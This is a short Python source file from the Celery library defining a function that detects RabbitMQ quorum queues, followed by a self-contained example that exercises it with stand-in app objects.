File: /usr/local/lib/python3.9/site-packages/celery/utils/quorum_queues.py
from __future__ import annotations


def detect_quorum_queues(app, driver_type: str) -> tuple[bool, str]:
    """Detect whether any configured queue is a RabbitMQ quorum queue.

    Only AMQP (RabbitMQ) brokers are inspected; for any other
    ``driver_type`` the function returns ``(False, "")`` without
    looking at the queues.

    Returns:
        tuple[bool, str]: Whether a quorum queue was found, and the name
        of the first quorum queue found (an empty string if there is none).
    """
    is_rabbitmq_broker = driver_type == 'amqp'

    if is_rabbitmq_broker:
        queues = app.amqp.queues
        for qname in queues:
            qarguments = queues[qname].queue_arguments or {}
            if qarguments.get("x-queue-type") == "quorum":
                return True, qname

    return False, ""
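
The behaviour of `detect_quorum_queues` can be checked without a running broker. The following is a minimal sketch, not part of Celery: `make_fake_app` is a hypothetical helper that builds a stand-in object exposing only `app.amqp.queues`, and the queue names `default` and `orders` are made up for illustration. The function body is repeated so the sketch runs on its own.

```python
from __future__ import annotations

from types import SimpleNamespace


def detect_quorum_queues(app, driver_type: str) -> tuple[bool, str]:
    # Repeated from the listing above so this sketch is self-contained.
    if driver_type == 'amqp':
        queues = app.amqp.queues
        for qname in queues:
            qarguments = queues[qname].queue_arguments or {}
            if qarguments.get("x-queue-type") == "quorum":
                return True, qname
    return False, ""


def make_fake_app(queue_args: dict) -> SimpleNamespace:
    """Hypothetical helper: a stand-in exposing only ``app.amqp.queues``."""
    queues = {
        name: SimpleNamespace(queue_arguments=args)
        for name, args in queue_args.items()
    }
    return SimpleNamespace(amqp=SimpleNamespace(queues=queues))


# One queue without arguments and one declared as a quorum queue.
fake_app = make_fake_app({
    "default": None,
    "orders": {"x-queue-type": "quorum"},
})

# AMQP driver: the quorum queue is found and its name is returned.
quorum_result = detect_quorum_queues(fake_app, "amqp")

# Non-AMQP driver: the queues are never inspected.
redis_result = detect_quorum_queues(fake_app, "redis")

# AMQP driver with only a classic queue: nothing is detected.
classic_app = make_fake_app({"default": {"x-queue-type": "classic"}})
classic_result = detect_quorum_queues(classic_app, "amqp")

print(quorum_result, redis_result, classic_result)
```

The `or {}` fallback is what lets the `default` queue, whose `queue_arguments` is `None`, pass through the loop without raising.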
